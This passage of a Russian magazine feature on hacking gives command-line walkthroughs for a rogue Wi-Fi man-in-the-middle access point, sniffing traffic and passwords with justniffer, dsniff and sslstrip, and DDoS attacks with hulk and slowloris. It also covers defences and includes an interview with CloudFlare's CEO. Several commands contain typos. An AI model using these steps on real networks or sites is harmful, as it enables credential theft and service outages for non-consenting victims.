Как ви­ди­те, про­цесс об­на­ру­жения уяз­ви­мо­стей тре­бу­ет знания то­го, что имен­но ис­кать, и на­хо­ж­дения при­ло­жений для это­го. Это мо­жет быть дол­гий и мед­лен­ный про­цесс. Есть ав­то­ма­ти­че­­ские сканеры (вро­де то­го, что вклю­чен в ZAP), но все же на­мно­го луч­ше де­лать это вруч­ную – так виднее, что про­ис­хо­дит. Мно­гие тес­ти­ров­щи­ки на проник­но­вение пред­по­чи­та­ют руч­ную ра­бо­ту, это по­зво­ля­ет им до­би­вать­ся ку­да луч­ших ре­зуль­та­тов, чем ав­то­ма­ти­че­ским сканерам.

[править] По­сред­ник

Как под­верг­нуть ата­ке от­дель­ный web-брау­зер.

По­ка мы рас­смот­ре­ли толь­ко ата­ку на сайт, но это лишь по­ло­ви­на ис­то­рии. Мы мо­жем так­же под­верг­нуть ата­ке че­ло­ве­ка, ко­то­рый на­хо­дит­ся в се­ти. Одним из спо­со­бов сде­лать это яв­ля­ет­ся XSS (на­при­мер, тот, что воз­мо­жен в ВМ WordPress), но мы сей­час скон­цен­три­ру­ем­ся на хи­щении дан­ных.

Для это­го есть несколь­ко спо­со­бов. На­при­мер, мож­но уста­но­вить на ком­пь­ю­тер вре­до­носное ПО и ис­поль­зо­вать его для пе­ре­хва­та се­те­во­го тра­фи­ка. Од­на­ко в на­шей ста­тье мы восполь­зу­ем­ся про­стей­шим спо­со­бом: раз­мес­тим вре­до­носный ком­пь­ю­тер ме­ж­ду жерт­вой и Ин­тернетом, что­бы весь тра­фик шел че­рез него. Это на­зы­ва­ет­ся ата­кой ти­па «По­средник» (Man In The Middle, MITM). Мо­же­те со­вер­шить ее с по­мо­щью се­те­вых ка­бе­лей, мо­же­те да­же вир­ту­аль­но со­вер­шить ее с по­мо­щью ата­ки ARP-spoofing; ну, а мы об­ра­тим­ся к Wi-Fi.

Как и все ата­ки, опи­сан­ные в этой ста­тье, зло­упот­реб­ление дан­ной ата­кой яв­ля­ет­ся неза­кон­ным в боль­шин­ст­ве стран. Это не оз­на­ча­ет зло­упот­реб­ление дан­ны­ми, это оз­на­ча­ет кра­жу дан­ных как та­ко­вую.

Что­бы про­тес­ти­ро­вать ата­ку, мы взя­ли нетбук, под­клю­чен­ный к Ethernet, для соз­дания бес­про­вод­ной точ­ки досту­па – лю­ди поль­зу­ют­ся та­ки­ми для со­единения с се­тью в ка­фе, да­же не за­ду­мы­ва­ясь о безопасности.

Во-пер­вых, нуж­на про­грам­ма на­строй­ки точ­ки досту­па. Мы ис­поль­зо­ва­ли hostapd. Она име­ет­ся в ре­по­зи­то­ри­ях неко­то­рых ди­ст­ри­бу­ти­вов, и доступ­на на http://hostap.epitest.fi/hostapd/. Вам так­же по­на­до­бит­ся DHCP-сер­вер – он по­зво­лит убе­дить­ся, что кли­ен­ты, со­единен­ные с ва­шей точ­кой досту­па, мо­гут по­лу­чить IP-ад­ре­са. Мы ис­поль­зо­ва­ли dhcpd3 (из па­ке­та dhcpd3-server в Ubuntu).

Обе­им про­грам­мам нуж­ны фай­лы на­строй­ки. Фай­лы для при­ме­ра вы най­де­те в tar-ар­хи­ве ко­да он­лайн на www.linuxformat.com/archive.

Ус­та­но­вив про­грам­му и най­дя файл на­строй­ки, на­строй­те свою точ­ку досту­па с по­мо­щью

sudo hostapd –Bdd hostapdl.conf

sudo dhcpd -4 –cf dhcp2.conf wlan0

Воз­мож­но, при­дет­ся до­ба­вить путь к двум фай­лам .conf, ес­ли их нет в те­ку­щей ди­рек­то­рии.

Вам нуж­но ве­леть сво­ей ма­шине пе­ре­на­пра­вить ин­тернет- со­единения на дру­гое се­те­вое со­единение; в про­тив­ном слу­чае лю­бая ма­ши­на, ко­то­рая со­еди­ня­ет­ся с ва­ми, не смо­жет по­лу­чить доступ к Ин­тернет.

sudo bash

echo “1” >/proc/sys/net/ipv4/ip_froward

iptables –t nat –A POSTROUTING –o eth0 –j MASQUERADE

Ве­ро­ят­но, са­мое уди­ви­тель­ное в Ин­тернете то, что боль­шая часть ин­фор­ма­ции не шиф­ру­ет­ся. Она про­сто от­прав­ля­ет­ся как обыч­ный текст, ко­то­рый мо­жет про­чи­тать лю­бой MITM без вся­ких про­блем со взло­мом шиф­ра.

Wireshark – от­лич­ный ин­ст­ру­мент для про­смот­ра дан­ных, про­хо­дя­щих че­рез ваш вре­до­носный ком­пь­ю­тер на уровне па­ке­тов, но боль­шую часть вре­мени нам не нуж­но уг­луб­лять­ся до это­го уров­ня. Вме­сто это­го мож­но ис­поль­зо­вать justniffer для воссоз­дания все­го се­те­во­го тра­фи­ка, про­хо­дя­ще­го че­рез на­шу вре­до­носную точ­ку досту­па.

Обыч­но этот ин­ст­ру­мент не вклю­ча­ет­ся в ре­по­зи­то­рии ди­ст­ри­бу­ти­вов. Что­бы уста­но­вить его в Ubuntu, до­бавь­те PPA:

sudo add-apt-repository ppa:oreste-notelli/ppa

sudo apt-get update

sudo apr-get install justniffer

В дру­гих ди­ст­ри­бу­ти­вах при­дет­ся ком­пи­ли­ро­вать его са­мо­стоя­тель­но. Под­роб­но­сти см. на http://justniffer.sourceforge.net/#!/install

Есть ряд оп­ций, по­зво­ляю­щих вы­пол­нять са­мые раз­ные ви­ды се­те­во­го монито­рин­га. Мы со­би­ра­ем­ся ис­поль­зо­вать его спо­соб­ность воссоз­да­вать web-страницы, ко­то­рые он ви­дит. Сна­ча­ла соз­дай­те ди­рек­то­рию дан­ных. В дан­ном при­ме­ре она бу­дет в до­машней ди­рек­то­рии ав­то­ра, но мо­жет на­хо­дить­ся где угод­но (непло­хо раз­мес­тить ее на от­дель­ном дис­ке, ес­ли вы планируе­те оста­вить ее ра­бо­тать на неко­то­рое вре­мя).

mkdir /home/ben/data

sudo justniffer-grab-http-traffic -d /home/ben/data -U ben -i wlan0

В обо­их стро­ках нуж­но за­менить ben на свое имя поль­зо­ва­те­ля. Оп­ция -U ко­ман­ду­ет, под ка­ким поль­зо­ва­те­лем со­хра­нять фай­лы.

Ес­ли вы со­единились с точ­кой досту­па че­рез ком­пь­ю­тер, план­шет или те­ле­фон и бро­ди­те по се­ти, вы долж­ны ви­деть ди­рек­то­рию дан­ных, за­пол­няе­мую фай­ла­ми для ка­ж­дой про­смот­рен­ной неза­шиф­ро­ван­ной страницы. Сю­да вхо­дит со­дер­жание всех про­чи­тан­ных пи­сем, пе­ре­дан­ных без ис­поль­зо­вания HTTPS (Gmail ис­поль­зу­ет его, и по­это­му пись­ма с него не бу­дут про­чи­та­ны; а боль­шин­ст­во осталь­ных сай­тов– нет).

Конеч­но, не все, что вы хо­ти­те пе­ре­хва­тить, про­хо­дит че­рез HTTP, и мно­гие дру­гие по­пу­ляр­ные про­то­ко­лы тоже не за­шиф­ро­ва­ны (на­при­мер, FTP и Telnet). На ваше сча­стье, есть и ин­ст­ру­менты, спо­соб­ные по­мочь вам ата­ко­вать их. На­при­мер, dsniff (http://monkey.org/~dugsong/dsniff) вы­та­щит из се­те­во­го тра­фи­ка все неза­шиф­ро­ван­ные па­ро­ли.

Оба эти ин­ст­ру­мен­та пас­сив­ны, то есть про­сто де­ла­ют ко­пии дан­ных, никак ина­че на них не воз­дей­ст­вуя. Мы мо­жем несколь­ко из­менить си­туа­цию, но для это­го при­дет­ся при­бег­нуть к ак­тив­ной ата­ке, в ча­ст­но­сти, к sslstrip.

sslstrip ис­поль­зу­ет са­му суть се­те­вых ссы­лок и тот факт, что неко­то­рые страницы за­шиф­ро­ва­ны, а неко­то­рые – нет. В основ­ном он от­сле­жи­ва­ет весь неза­шиф­ро­ван­ный тра­фик и ждет ссыл­ки или пе­ре­ад­ре­са­ции на сай­ты HTTPS, а за­тем на­чи­на­ет ата­ку MITM: sslstrip за­пра­ши­ва­ет безо­пас­ную вер­сию сай­та и вы­да­ет ее брау­зе­ру в ви­де про­сто­го HTTP.

Сайт мо­жет за­бло­ки­ро­вать по­доб­ную ата­ку, од­на­ко в це­ли на­шей ста­тьи не вхо­дит рас­смот­рение это­го про­цес­са. Од­на­ко мы об­на­ру­жи­ли, что неко­то­рые по­пу­ляр­ные сай­ты (вклю­чая Facebook и Yahoo) ока­за­лись уяз­ви­мы. Мы со­об­щи­ли об этой про­бле­ме ко­ман­дам безо­пас­но­сти этих сай­тов. Facebook нам от­ве­тил, что они ре­ко­мен­ду­ют вклю­чить на­строй­ки безо­пас­но­сти брау­зе­ра. Од­на­ко оста­но­вить ата­ку им не уда­ст­ся, и когда мы со­об­щи­ли об этом, нам ниче­го не от­ве­ти­ли. А от Yahoo от­ве­та во­об­ще не поступи­ло.

[править] Шиф­руй­тесь

Вы мо­же­те рас­смат­ри­вать Ин­тернет как сво­его ро­да поч­то­вый сер­вис. Обыч­но дан­ные пе­ре­да­ют­ся неза­шиф­ро­ван­ны­ми, и это по­хо­же на пе­ре­сыл­ку от­крыт­ки. Про­чи­тать ее мо­жет мно­же­ст­во лю­дей, с мо­мен­та от­прав­ки и до мо­мен­та достав­ки, и то же мож­но ска­зать и об ин­фор­ма­ции, от­прав­ляе­мой че­рез HTTP, FTP, Telnet. Иногда это не име­ет зна­чения – вам, ве­ро­ят­но, на­пле­вать, ес­ли поч­таль­он ва­шей ба­буш­ки уз­на­ет, что над всей Ис­панией без­об­лач­ное небо – но иногда и важ­но; и вы вряд ли за­хо­ти­те, что­бы поч­таль­он уз­нал ва­ши бан­ков­ские ре­к­ви­зи­ты. То же са­мое мож­но ска­зать и о дан­ных он­лайн. Ес­ли вы не хо­ти­те, что­бы ва­ши дан­ные бы­ли доступ­ны для ши­ро­кой пуб­ли­ки, ис­поль­зуй­те за­шиф­ро­ван­ный про­то­кол (HTTPS, SFTP, SSH, SCP и т. п.).

Что­бы несколь­ко уп­ро­стить эту за­да­чу, Electronic Frontier Foundation (EFF) соз­да­ли рас­ши­рение для Firefox (вер­сия для Chrome на­хо­дит­ся на аль­фа-ста­дии раз­ра­бот­ки) под на­званием HTTPS Everywhere. Оно обес­пе­чи­ва­ет ис­поль­зо­вание по умол­чанию за­шиф­ро­ван­ной вер­сии сай­та, ес­ли та­ко­вая су­ще­ст­вует. Ес­ли у сай­та нет за­шиф­ро­ван­ной вер­сии, то оно бу­дет ра­бо­тать с неза­шиф­ро­ван­ной, так что бди­тель­ность те­рять все рав­но не советуем.

Как мы ви­де­ли бла­го­да­ря sslstrip, нуж­но быть крайне осто­рож­ным при ис­поль­зо­вании от­кры­той се­ти, да­же ес­ли сайт за­шиф­ро­ван. Пре­ж­де чем вво­дить ка­кую-ли­бо ин­фор­ма­цию, убе­ди­тесь, что вы ис­поль­зуе­те HTTPS.

За­шиф­ро­ван­ные про­то­ко­лы со­хра­ня­ют кон­фи­ден­ци­аль­ность дан­ных, но они не скры­ва­ют, ка­кие сер­ве­ры вы ис­поль­зуе­те. На­при­мер, зло­умыш­ленник мо­жет уз­нать, что вы ис­поль­зуе­те gmail.com, но не смо­жет уз­нать, под ка­ким именем поль­зо­ва­те­ля вы ра­бо­тае­те или ка­кие со­об­щения по элек­трон­ной поч­те по­лу­чае­те или от­прав­ляе­те. Ес­ли по­ми­мо шиф­ро­вания вам нуж­на и аноним­ность, поль­зуй­тесь VPN или Tor (https://www.torproject.org/). Помните, что для обес­пе­чения долж­ной за­щи­ты и в этом случае все рав­но на­до ис­поль­зо­вать про­то­кол с шиф­ро­ванием.

> sstrtip со­хра­ня­ет ко­пию все­го неза­шиф­ро­ван­но­го тра­фи­ка. Обычная ко­ман­да grep мо­жет най­ти лю­бые дан­ные иден­ти­фи­ка­ции (не радуйтесь: это не на­стоя­щие учет­ные за­пи­си).


[править] DDoS

Со­кру­ши­те на­ме­чен­ный сер­вер.

Distributed Denial of Service (DDoS), ве­ро­ят­но, са­мый раз­рек­ла­ми­ро­ван­ный вид ата­ки за по­следнее вре­мя. Anoni­mous и про­чие ха­кер­ст­вую­щие кол­лек­ти­вы при­бе­га­ли к нему для атак на пра­ви­тель­ст­ва, фи­нан­со­вые уч­ре­ж­дения и про­чие ор­ганиза­ции, ко­то­рые в чем-то им на­со­ли­ли. Хоть это и не так рек­ла­ми­ро­ва­лось, но DOS так­же стал ору­жи­ем, ко­то­рое ис­поль­зо­ва­ли кри­ми­наль­ные эле­мен­ты. Од­на­ко пре­ж­де чем го­во­рить о при­чи­нах это­го, да­вай­те рас­смот­рим, что та­кое DDoS-ата­ки и как они ра­бо­та­ют.

В об­щих чер­тах, DDoS-ата­ка не по­зво­ля­ет сер­ве­ру вы­пол­нять свои обыч­ные функ­ции, от­ка­зы­вая та­ким об­ра­зом поль­зо­ва­те­лям в об­слу­жи­вании. Обыч­но это web-сер­вер, но необя­за­тель­но. Это де­ла­ет­ся не по­сред­ст­вом взло­ма ком­пь­ю­те­ра или по­лу­чения досту­па, а пе­ре­груз­кой сер­ве­ра боль­шим по­то­ком за­про­сов.

На­при­мер, ата­кую­щий мо­жет пе­ре­гру­зить се­те­вое со­единение сер­ве­ра фик­тив­ны­ми дан­ны­ми, и ника­кие полезные па­ке­ты про­скольз­нуть не смо­гут, или он мо­жет за­хва­тить все цик­лы CPU, и сер­вер не смо­жет об­ра­ба­ты­вать дру­гие за­про­сы.

По­сколь­ку боль­шин­ст­во со­вре­мен­ных сер­ве­ров име­ют вы­со­кую про­пу­ск­ную спо­соб­ность, мощ­ные CPU и боль­шое ко­ли­че­­ст­во па­мя­ти, как пра­ви­ло, их не очень-то пе­ре­гру­зишь толь­ко с по­мо­щью до­машнего ши­ро­ко­по­лосно­го со­еди­не­ния. Что­бы до­бить­ся это­го, ата­кую­щие час­то ис­поль­зу­ют несколь­ко ком­пь­ю­те­ров для од­но­вре­мен­ной ата­ки на цель. В слу­чае хак­ти­ви­стов это де­ла­ется груп­пой со­чув­ст­вую­щих; в слу­чае пре­ступ­ных эле­мен­тов, это час­то де­ла­ет­ся ботнета­ми.

Есть мно­же­ст­во ин­ст­ру­мен­тов, спо­соб­ных по­мочь вам про­вес­ти тест на DDOS. Лю­би­мей­ший ин­ст­ру­мент Anonimous – High Orbit Ion Cannon, по­сколь­ку он прост для неис­ку­шен­ных поль­зо­ва­те­лей. Од­на­ко мы рас­смот­рим hulk. Его мож­но най­ти на http://packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html. Что­бы за­пустить hulk, про­сто рас­па­куй­те его и ско­ман­дуй­те:

unzip hulk zip

python hulk py http://<site>

Что­бы про­тес­ти­ро­вать его, мож­но ско­рень­ко на­стро­ить сер­вер HTTP с по­мо­щью

python -m SimpleHTTPServer

и за­тем ата­ко­вать его ко­ман­дой

python hulk.py http://<ip address>:8000

Мы об­на­ру­жи­ли, что это вполне эф­фек­тив­но об­ру­ши­ва­ет сайт. Но есть оче­вид­ная разница ме­ж­ду об­ру­шением неболь­шо­го web-сер­ве­ра на Python и вы­би­вание со­лид­но­го сер­ве­ра Apache в ре­жим оф­флайн. Hulk про­сто пы­та­ет­ся за­ки­дать ма­ши­ну за­про­са­ми. Те­перь мы рас­смот­рим дру­гой ин­ст­ру­мент, бо­лее ра­зум­ный. Slowlories (он есть на http://ha.ckers.org/slowloris/ или на DVD) ра­бо­та­ет, пы­та­ясь удер­жать как мож­но боль­ше со­единений от­кры­ты­ми, с це­лью ис­чер­пать ре­сур­сы сер­ве­ра. Это тре­бу­ет на­мно­го мень­шей по­ло­сы ве­щания, чем ата­ка гру­бой си­лы в сти­ле hulk, од­на­ко не все сер­вер­ное ПО яв­ля­ет­ся уяз­ви­мым. Что­бы за­пустить slowlories, про­сто сде­лай­те файл ис­пол­няе­мым и за­тем вы­зо­ви­те его с по­мо­щью:

chmode a+x slowlories.pl

./slowris.pl -dns <site>

И сно­ва наш сер­вер на Python сдал­ся мгно­вен­но.

[править] За­щи­щай­тесь

За­щи­та от DDoS-ата­ки за­клю­ча­ет­ся в миними­за­ции ущер­ба от ка­ж­до­го вре­до­носно­го па­ке­та. Дру­ги­ми сло­ва­ми, на­до оста­но­вить как мож­но боль­ше та­ких па­ке­тов, как толь­ко они поя­вят­ся в ва­шей се­ти. Для это­го ну­жен бранд­мау­эр и умение его на­стро­ить, что­бы он оп­ре­де­лял и от­бра­сы­вал со­от­вет­ст­вую­щие па­ке­ты.

Как имен­но вы это сде­лае­те, за­ви­сит от бранд­мау­эра, и под­хо­дя­щие пра­ви­ла бу­дут по­сто­ян­но ме­нять­ся в веч­ной охо­те кош­ки за мы­шью, когда ата­кую­щий бу­дет ме­нять свои па­ке­ты, что­бы обой­ти ваш бранд­мау­эр. Од­на­ко мы ска­жем вот что: уз­най­те, как за­щи­тить се­бя, до то­го, как под­вергнетесь ата­ке! Про­буй­те все­воз­мож­ные пред­ла­гае­мые ин­ст­ру­мен­ты DDoS и прак­ти­куй­тесь в ис­кусст­ве их бло­ки­ро­вать, по­то­му что вряд ли вам по­нра­вит­ся учить­ся это­му по­сле то­го, как ваш сайт рухнет. Ра­бо­та с ин­ст­ру­мен­та­ми DDoS – так­же от­лич­ный спо­соб уз­нать, как бу­дет се­бя вес­ти ваш сайт под пиковой на­груз­кой.

В по­ряд­ке аль­тер­на­ти­вы, мож­но по­мес­тить свой сер­вер в сеть, спо­соб­ную по­за­бо­тить­ся о нем вме­сто вас. Та­кие про­вай­де­ры, как CloudFlare, по­мес­тят ваш сер­вер за свой бранд­мау­эр (вир­ту­аль­но, вам не нуж­но за­но­во со­еди­нять­ся с сер­ве­ром). А зна­чит, вам не при­дет­ся бес­по­ко­ить­ся о тон­ко­стях на­стой­ки бранд­мау­эра.

> Ло­ри мед­лен­ные [Slow lories] — тип при­ма­тов, оби­та­ю­щих в Юж­ной и Юго-Вос­точ­­ной Азии. Ес­ли хо­ти­те уз­нать, как они вы­гля­дят, про­сто от­крой­те файл Perl в тек­сто­вом ре­дак­то­ре.

«Ряд крупней­ших из на­блю­дае­мых атак – по су­ти, вы­мо­га­тель­ст­во он­лайн»

Из­ра­иль­тяне и па­ле­стин­цы со­глас­ны в од­ном: в вы­бо­ре за­щитника от DDoS-атак. И вот мы встре­ти­лись с Мэ­тью Прин­сом, ру­ко­во­ди­те­лем и со­уч­ре­ди­те­лем CloudFlare, что­бы вы­яснить, как же он пы­та­ет­ся опережать он­лайн-злоумышленников.

Linux Format: Вы за­ме­ча­ли, что гео­гра­фия он­лайн-атак со вре­менем ме­ня­ет­ся?

LXF170.feat hackleweb.m fmt.png

Мэ­тью Принс [Matthew Prince]: Мы с мо­им со­уч­ре­ди­те­лем на­ча­ли ра­бо­тать над про­бле­ма­ми се­те­вой безо­пас­но­сти в 2003 го­ду, за­пустив про­ект Honey Pot. Це­лью бы­ло от­сле­жи­вать он­лай­но­вые мо­шенниче­­ст­ва с кре­дит­ны­ми кар­та­ми, и в пер­вую оче­редь мы от­сле­жи­ва­ли, как спа­ме­ры кра­дут ад­ре­са элек­трон­ной поч­ты с сай­тов. В те вре­ме­на луч­шим спо­со­бом для пло­хих парней сде­лать день­ги он­лайн бы­ло стать спа­ме­ром или тру­дить­ся на ниве спа­ма. Мне ка­жет­ся, эта си­туа­ция ме­ня­ет­ся. Эта сфе­ра все еще весь­ма при­быль­на, но уже не так, как рань­ше. В спа­ме есть од­на ин­те­рес­ная вещь: что­бы их не об­на­ру­жи­ли, спа­ме­ры ста­ли ис­поль­зо­вать ре­сур­сы соз­да­те­лей ви­ру­сов [ком­пь­ю­те­ры, ко­то­рые бы­ли ча­стью ботнета] для сво­их рас­сы­лок. По ме­ре то­го, как с го­да­ми улуч­ша­лись фильт­ры спа­ма и спам ста­но­вил­ся менее при­быль­ным, мы уви­де­ли, как те же са­мые ре­сур­сы ботнета ста­ли ис­поль­зо­вать­ся для ря­да дру­гих атак. Та­ким об­ра­зом, по су­ти мы сей­час име­ем де­ло с той же про­бле­мой, что и в 2003-м: име­ют­ся за­ра­жен­ные ма­ши­ны, и они ис­поль­зу­ют­ся, что­бы соз­дать еще боль­шие про­бле­мы. В 2003-м это был спам, в 2012-м стал DDoS. Од­на­ко ре­сур­сы, ко­то­ры­ми он­лайн-зло­умыш­ленники поль­зу­ют­ся для за­пуска ата­ки, по­следние 10 лет оста­ют­ся все те­ми же.

LXF: В чем са­мая боль­шая уг­ро­за для он­лайн-бизнеса?

МП: Мне ка­жет­ся, очень силь­но вы­росло как ко­ли­че­­ст­во атак [DDoS], так и их раз­мер. Мы на­блю­да­ем ре­гу­ляр­ные ата­ки, пре­вы­шаю­щие 50 или 60 ГБ/с, ко­то­рым под­вер­га­ет­ся на­ша сеть. У нас круп­ная и мощ­ная сеть, и мы справ­ля­ем­ся с ата­ка­ми в несколь­ко со­тен ГБ, но, знае­те ли, 50 или 60 ги­гов – это боль­ше, чем мо­гут от­пра­вить са­мые круп­ные хостинг-про­вай­де­ры. Я не знаю ни од­но­го бан­ка с по­доб­ным тра­фи­ком. С этим труд­но спра­вить­ся, по­то­му что немно­го най­дет­ся ре­сур­сов обо­ру­до­вания, ко­то­рые мож­но бы­ло бы за­дей­ст­во­вать, что­бы пре­кра­тить та­кую ата­ку. Не­важ­но, круп­ное у вас пред­при­ятие или мел­кое, за­ра­ба­ты­ваю­щее он­лайн, я по­ла­гаю, что мас­штаб и объ­ем ныне на­блю­дае­мых DDoS-атак вну­ша­ет серь­ез­ные опа­сения для мно­же­ст­ва пред­при­ятий.

LXF: Вы ис­сле­дуе­те при­чи­ны этих атак?

МП: Мы не осо­бо тра­тим вре­мя на вы­яснение при­чин и то­го, кто за этим сто­ит, хо­тя, конеч­но, по­лу­ча­ем ин­фор­ма­цию от кли­ен­тов на­счет то­го, что, по их мнению, по­слу­жи­ло мо­ти­вом; и мо­ти­вы очень раз­ные. Мы ви­де­ли ата­ки по ком­мер­че­­ским со­об­ра­жениям. Бы­ва­ют слу­чаи, когда ата­ка за­ка­за­на кон­ку­рен­том. Ряд крупней­ших из на­блю­да­емых атак – по су­ти, вы­мо­га­тель­ст­во он­лайн, когда некий зло­умыш­ленник от­прав­ля­ет элек­трон­ной по­чтой на среднего (обыч­но) раз­ме­ра сайт e-commerce со­об­щение при­мер­но та­ко­го со­дер­жания: «ли­бо вы пла­ти­те нам эн­ную сум­му, ли­бо мы пе­ре­кры­ва­ем вам доступ в Ин­тернет». Ко­ли­че­­ст­во по­доб­ных атак рас­тет по­сто­ян­но.

К нам об­ра­щал­ся че­чен­ский но­во­ст­ной сайт, ата­ко­ван­ный россий­ски­ми пра­ви­тель­ст­вен­ны­ми уч­ре­ж­дения­ми или кем-то, со­чув­ст­вую­щим россий­ским пра­ви­тель­ст­вен­ным уч­ре­ж­дениям. У нас есть кли­ен­ты с обе­их сто­рон ближнево­сточ­но­го кон­флик­та. На­ши­ми услу­га­ми поль­зу­ют­ся из­ра­иль­ские, пале­стин­ские и еги­пет­ские сай­ты – на мно­гие из них со­вер­ша­лись мас­штаб­ные ата­ки, и все с по­ли­ти­че­­ской по­до­п­ле­кой. WikiLeaks так­же поль­зо­ва­лась [CloudFlare], для пре­кра­щения мас­штаб­ных атак от­ка­за в об­слу­жи­вании. Хо­тя ата­ки хак­ти­ви­стов наи­бо­лее по­пу­ляр­ны в прес­се, в основ­ном они не са­мые круп­но­мас­штаб­ные. Вы­яс­ня­ет­ся, что са­мые круп­ные ата­ки име­ют оп­ре­де­лен­ную пра­ви­тель­ст­вен­ную под­держ­ку – вот те бы­ва­ют дей­ст­ви­тель­но круп­ны­ми. Или те, что яв­ля­ют­ся он­лайн-вы­мо­га­тель­ст­вом. Мы ви­де­ли ата­ки на сай­ты эс­корт-услуг, когда ряд тру­жениц сек­са ре­шил из­ба­вить­ся от су­тенеров, а су­тенеры ста­ли их пре­сле­до­вать. В прин­ци­пе, лю­бой, у ко­го есть на вас зуб и ре­сур­сы, что­бы доста­вить вам непри­ят­но­сти, мо­жет в на­ше вре­мя ор­ганизо­вать до­воль­но со­лид­ную ата­ку, спо­соб­ную вы­ши­бить оф­флайн да­же круп­ную ор­ганиза­цию. Пол­ную вер­сию ин­тер­вью см. на www.tuxradar.com/content/mpivew. |

Персональные инструменты
купить
подписаться
Яндекс.Метрика